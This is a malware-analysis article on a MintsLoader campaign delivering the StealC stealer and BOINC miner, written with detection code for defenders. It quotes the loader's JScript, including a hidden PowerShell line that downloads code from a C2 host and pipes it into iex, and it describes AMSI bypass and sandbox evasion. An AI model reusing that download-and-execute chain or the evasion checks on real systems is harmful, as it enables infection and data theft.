MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Overview
Recently, there has been an ongoing campaign using a malware loader called MintsLoader to distribute malicious payloads such as the StealC information stealer and BOINC.
According to the cybersecurity company eSentire, this campaign mainly targets electricity, oil and gas companies, and the legal services sector in the United States and Europe.
Key Findings
MintsLoader is a malware loader used to spread and deploy other malware on victims' computers. According to recorded reports, it is often distributed through:
Fake websites or pirated software
Phishing emails
Malvertising
The MintsLoader infection process begins when a victim clicks a link in a spam email that downloads a JScript file whose name matches the regex pattern Fattura [0-9]{8}.js.

StealC is a type of information-stealing malware, designed to collect sensitive data from infected devices. It mainly targets web browsers and popular applications to steal:
Login information (username, password)
Browser cookies (to maintain session even if the password is changed)
Autofill data like credit card numbers, addresses
Cryptocurrency wallets and bank account information
Clipboard data (which may contain passwords or authentication codes)
BOINC is not malware, but in some cases, hackers can misuse this platform to mine cryptocurrency or perform unauthorized computations using other people's computers.
The content of the JScript file was captured and is broken down below.

How attackers carry out the campaign
Initially, the attacker tricks the victim into downloading an infected file from an untrusted source, such as an email attachment or link, or an unfamiliar website. In this campaign, the file "Fattura[0-9]{8}.js" was downloaded onto the victim's machine. It is a malicious JScript file run by Windows Script Host (WSH); it launches a PowerShell command that downloads and executes the next stage from a web address, and then deletes itself from the victim's system.

2.1 Wscript.Sleep(13000);
This command pauses the script for 13 seconds. The delay can be used to outlast sandbox timeouts or security software that only watches the first moments of execution, or simply to give the rest of the chain time to prepare before the malicious code runs.
2.2 var shell = WScript.CreateObject("Wscript.Shell");
This creates a WScript.Shell object, which lets the script execute system commands such as running programs.
2.3 shell.Run("powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c \"curl -useb 'http://mubuzb3vwv[.]top/1.php?s=nints13' | iex\"");
shell.Run(): runs a command in the system environment; here it starts PowerShell and hands it a command to execute.
powershell -noprofile -executionpolicy bypass: starts PowerShell without loading the user profile and with the execution policy bypassed, so the downloaded code is allowed to run.
-WindowStyle hidden: runs PowerShell in hidden mode, so no PowerShell window is shown to the user.
curl -useb 'http://mubuzb3vwv[.]top/1.php?s=nints13' | iex: curl (in Windows PowerShell an alias for Invoke-WebRequest; -useb is short for -UseBasicParsing) downloads the content at the URL. The URL is the web address from which the next stage is fetched. The downloaded content is piped (|) into iex (an alias for Invoke-Expression), so the code served by that site executes on the system.
2.4 var filesystemobj = WScript.CreateObject("Scripting.FileSystemObject");
This creates a FileSystemObject, which lets the script interact with the file system (creating, deleting, or copying files).
2.5 filesystemobj.DeleteFile(WScript.ScriptFullName);
This command deletes the currently running script file. WScript.ScriptFullName returns the full path of the current script, so once this line runs the loader has removed itself from disk.
The next step involves running a PowerShell script to:
Download and execute malware from a command and control (C2) server.
Install StealC Malware or BOINC mining software to steal information or exploit system resources.
Open a backdoor on the victim's machine, allowing hackers to access the system remotely.
Avoid detection by obfuscating PowerShell commands to evade security software.
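The loader chain above has a distinctive process-creation footprint: wscript.exe running a Fattura-named .js file spawns powershell.exe with -noprofile, an execution-policy bypass, a hidden window, and a curl ... | iex download cradle. The following Python is an added detection example written for this article, not code from the page or from eSentire; it runs the check over constructed Sysmon-style events (the field names mirror Sysmon Event ID 1, the sample values are made up except for the C2 host the page documents) and alerts only when the cradle appears together with other indicators, so a lone -ExecutionPolicy Bypass in an admin script does not fire.

```python
import re

# Constructed sample process-creation events (shaped like Sysmon Event ID 1
# fields); they are not log data from the page. The C2 host is the one the
# page documents, every other value is made up.
SAMPLE_EVENTS = [
    {  # the MintsLoader chain: wscript.exe running the Fattura lure spawns PowerShell
        "ParentImage": r"C:\Windows\System32\wscript.exe",
        "ParentCommandLine": r'"C:\Windows\System32\wscript.exe" "C:\Users\user\Downloads\Fattura 20250114.js"',
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": ("powershell -noprofile -executionpolicy bypass -WindowStyle hidden "
                        "-c \"curl -useb 'http://mubuzb3vwv.top/1.php?s=nints13' | iex\""),
    },
    {  # benign: a backup script started from explorer
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r"powershell -noprofile -File C:\scripts\backup.ps1",
    },
]

# Lure file name pattern as given on the page.
FATTURA_LURE = re.compile(r"Fattura [0-9]{8}\.js", re.IGNORECASE)

# Each indicator is one observable piece of the loader's behaviour.
# PowerShell accepts unambiguous prefixes of parameter names, so the
# regexes match -ep/-exec/-executionpolicy and -w/-windowstyle alike.
INDICATORS = {
    "wsh_parent": lambda ev: ev["ParentImage"].lower().endswith(("\\wscript.exe", "\\cscript.exe")),
    "fattura_lure": lambda ev: FATTURA_LURE.search(ev["ParentCommandLine"]) is not None,
    "execution_policy_bypass": lambda ev: re.search(r"-e\w*\s+bypass\b", ev["CommandLine"], re.I) is not None,
    "hidden_window": lambda ev: re.search(r"-w\w*\s+hidden\b", ev["CommandLine"], re.I) is not None,
    "download_cradle": lambda ev: re.search(
        r"\b(curl|iwr|invoke-webrequest|wget)\b.*\|\s*(iex|invoke-expression)\b",
        ev["CommandLine"], re.I) is not None,
}


def triage_event(event):
    """Return the names of the indicators that fire on one event, in table order."""
    return [name for name, check in INDICATORS.items() if check(event)]


def is_mintsloader_like(event, threshold=3):
    """Flag an event when the download cradle is present together with enough
    other indicators to reach `threshold` hits in total."""
    hits = triage_event(event)
    return "download_cradle" in hits and len(hits) >= threshold


def run_detection(events):
    """Return (event index, fired indicators) for every flagged event."""
    return [(i, triage_event(ev)) for i, ev in enumerate(events) if is_mintsloader_like(ev)]


if __name__ == "__main__":
    for idx, hits in run_detection(SAMPLE_EVENTS):
        print(f"event {idx}: MintsLoader-like PowerShell launch, indicators={hits}")
```

The same indicator table translates directly into a Sigma or EDR query; the combination rule is the part worth keeping, because each indicator on its own is common in legitimate administration.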


The attacker performs checks on the victim's machine environment to see if it is a virtual machine by running a PowerShell script and using anti-analysis techniques (Anti-VM Detection).



After completing the checks on the victim's system, the attacker continues to execute PowerShell to create a random C2 (Command & Control) domain. This helps the malware communicate with the control server without being easily detected or blocked by cybersecurity measures.


The script first creates $c2 as an empty string, then generates a random domain name from the alphabet, and finally appends .top to form the C2 domain name.
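Because the C2 name is generated rather than fixed, blocking one domain is not enough; the defender's handle is the shape of the names under .top in DNS logs. The Python below is an added example for this article, not code from the page or from eSentire. It scores the registrable label of each queried .top name on three cheap signals (character entropy, vowel ratio, longest vowel-free run) and flags names that hit at least two, which catches random alphabetic labels of the kind described above without flagging ordinary words; the log lines are constructed, and the only real name among them is the C2 host the page documents. This is triage for an analyst queue, not a verdict.

```python
import math

VOWELS = set("aeiou")

# Constructed DNS query log lines (timestamp, client, record type, name);
# not log data from the page. mubuzb3vwv.top is the C2 host the page
# documents; qzxvkwjpbtnrm.top is a made-up random-looking name.
SAMPLE_DNS_LOG = """\
2025-01-14T10:01:02Z 10.0.0.5 A www.example.top
2025-01-14T10:01:03Z 10.0.0.5 A mail.google.com
2025-01-14T10:01:09Z 10.0.0.7 A mubuzb3vwv.top
2025-01-14T10:01:11Z 10.0.0.7 A qzxvkwjpbtnrm.top
2025-01-14T10:01:15Z 10.0.0.9 A wordpress.top
"""


def shannon_entropy(s):
    """Bits of entropy per character of s (0 for the empty string)."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def longest_consonant_run(label):
    """Length of the longest stretch without a vowel (digits count as non-vowels)."""
    run = best = 0
    for c in label:
        run = 0 if c in VOWELS else run + 1
        best = max(best, run)
    return best


def dga_score(label):
    """Score 0-3 from three signals that separate random labels from words:
    high character entropy, few vowels, and a long vowel-free run.
    Short labels score 0 because the signals are unreliable on them."""
    if len(label) < 8:
        return 0
    score = 0
    if shannon_entropy(label) >= 3.0:
        score += 1
    if sum(c in VOWELS for c in label) / len(label) <= 0.25:
        score += 1
    if longest_consonant_run(label) >= 5:
        score += 1
    return score


def triage_dns(log_text, tld="top", min_score=2):
    """Return the distinct queried names under `tld` whose registrable label
    scores at least `min_score`, in order of first appearance."""
    flagged = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        qname = line.split()[-1].lower().rstrip(".")
        parts = qname.split(".")
        if len(parts) < 2 or parts[-1] != tld:
            continue
        if dga_score(parts[-2]) >= min_score and qname not in flagged:
            flagged.append(qname)
    return flagged


if __name__ == "__main__":
    for name in triage_dns(SAMPLE_DNS_LOG):
        print(f"review: {name} (score {dga_score(name.split('.')[-2])})")
```

The .top filter is a parameter only because the page reports that suffix; the scoring itself is TLD-independent, and in practice you would also join flagged names against NXDOMAIN counts and first-seen time, since a generated name is usually young and queried by few hosts.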
The next step in this campaign involves the attackers executing a malicious script that:
Pauses execution using sleep() to avoid detection.
Disables AMSI protection in Windows Defender.
Downloads the malicious executable file (aa.exe) from a remote server (temp.sh).
Runs the executable file (aa.exe) to infect the system.

After MintsLoader has finished running on the victim's machine, the attacker deploys StealC. It begins with a piece of C code that checks the infected machine's environment before continuing execution; if the computer name or user is invalid, the program exits (ExitProcess(0)) to avoid analysis.
StealC then checks the victim's country to avoid infecting machines in Russia, Ukraine, Belarus, Kazakhstan or Uzbekistan. When it detects that the victim's machine is in one of these countries, the malware exits automatically to avoid legal risk.

In addition to checking the computer name, user, and country, the malware checks the number of CPUs. If the machine has fewer than 2 CPUs, the malware exits (ExitProcess(0)), since analysis virtual machines are often given a single CPU to save resources. Another piece of C code then checks the victim's machine's RAM size, and the malware exits if the machine has less than 1111 MB.
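These gates matter to the defender as much as to the malware: a detonation in an undersized sandbox quietly produces no stealer behaviour at all. The Python below is an added example for this article, not code from the page or from StealC's source; it parses excerpts of `systeminfo` output from an analysis VM (the excerpts are constructed, and the line formats follow the real command's output) and reports which of the documented gates that VM would trip. The thresholds and country list are the ones given above; how StealC actually determines the country is not stated on the page, so reading it from the system locale's region is an assumption of this example.

```python
import re

# Thresholds and country list as the page describes StealC's checks.
# Regions are ISO 3166-1 alpha-2 codes. Reading the country from the system
# locale is this example's assumption; the page does not name the API used.
BLOCKED_REGIONS = {"RU", "UA", "BY", "KZ", "UZ"}
MIN_CPUS = 2
MIN_RAM_MB = 1111

# Constructed excerpts of `systeminfo` output for three analysis VMs
# (not taken from the page); values are made up.
SANDBOX_SMALL = """\
Host Name:                 SANDBOX01
OS Name:                   Microsoft Windows 10 Pro
System Locale:             en-us;English (United States)
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2100 Mhz
Total Physical Memory:     1,024 MB
"""
SANDBOX_RU = """\
Host Name:                 SANDBOX02
System Locale:             ru-ru;Russian (Russia)
Processor(s):              4 Processor(s) Installed.
Total Physical Memory:     8,192 MB
"""
SANDBOX_OK = """\
Host Name:                 SANDBOX03
System Locale:             en-us;English (United States)
Processor(s):              2 Processor(s) Installed.
Total Physical Memory:     4,096 MB
"""


def parse_systeminfo(text):
    """Pull CPU count, RAM in MB and locale region out of systeminfo output.
    Missing fields come back as None so a gate can refuse to judge them."""
    cpus = re.search(r"Processor\(s\):\s+(\d+) Processor\(s\) Installed", text)
    ram = re.search(r"Total Physical Memory:\s+([\d,]+) MB", text)
    loc = re.search(r"System Locale:\s+([A-Za-z]{2})-([A-Za-z]{2})", text)
    return {
        "cpus": int(cpus.group(1)) if cpus else None,
        "ram_mb": int(ram.group(1).replace(",", "")) if ram else None,
        "region": loc.group(2).upper() if loc else None,
    }


def stealc_gates(profile):
    """Return the names of the StealC exit gates this profile would trip.
    An empty list means the sample would proceed to its stealing phase."""
    tripped = []
    if profile["region"] in BLOCKED_REGIONS:
        tripped.append("country")
    if profile["cpus"] is not None and profile["cpus"] < MIN_CPUS:
        tripped.append("cpu_count")
    if profile["ram_mb"] is not None and profile["ram_mb"] < MIN_RAM_MB:
        tripped.append("ram_size")
    return tripped


def check_sandbox(systeminfo_text):
    """Convenience wrapper: systeminfo text in, tripped gate names out."""
    return stealc_gates(parse_systeminfo(systeminfo_text))


if __name__ == "__main__":
    for name, text in (("SANDBOX01", SANDBOX_SMALL), ("SANDBOX02", SANDBOX_RU), ("SANDBOX03", SANDBOX_OK)):
        gates = check_sandbox(text)
        print(f"{name}: {'would run' if not gates else 'exits on ' + ', '.join(gates)}")
```

Run `systeminfo` inside the sandbox, paste the output into `check_sandbox`, and fix the VM before re-detonating; the computer-name and user-name gates the page mentions are not modelled here because it does not list the values StealC rejects.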

After completing the checks, StealC can start stealing:
Usernames and passwords from browsers
Browser cookies (which can be used to hijack accounts)
Autofill data such as bank card information and addresses
Cryptocurrency wallets from crypto management software
Clipboard data (which may contain passwords or OTP codes)
After collecting the data, StealC sends all the information to the attacker's server.
Immediately after, BOINC (Berkeley Open Infrastructure for Network Computing) will be deployed. Hackers exploit BOINC to use computer resources for purposes such as:
Cryptocurrency mining by using the victim's CPU/GPU without their knowledge.
Performing complex calculations for fake projects to gain profit.
IOC
eSentire IOC list on GitHub: iocs/MintsLoader/MintsLoader_Stealc_01_14_2025.txt (repository eSentire/iocs, main branch)
Recommendations
Do not download software from unknown sources, especially cracked software or pirated games.
Do not open suspicious emails or links, even if they appear to be from a legitimate organization.
Regularly update software and operating systems to avoid security vulnerabilities.
Check for hidden processes running on your system; if you see BOINC or unfamiliar software that you didn't install, investigate immediately.
Use strong antivirus software to detect malware loaders like MintsLoader.
Conclusion
The MintsLoader campaign is reported to target organizations in the US and Europe and is mainly distributed through spam emails containing links to JScript files, or via ClickFix/KongTuke. Combined with information stealers like StealC, it poses a threat to the security and integrity of sensitive data.
MintsLoader is a dangerous tool that can be used to deploy StealC Malware (data theft) and BOINC (exploiting computer resources) without the victim's consent. If you suspect your system is infected, you should check and remove it immediately to prevent serious consequences.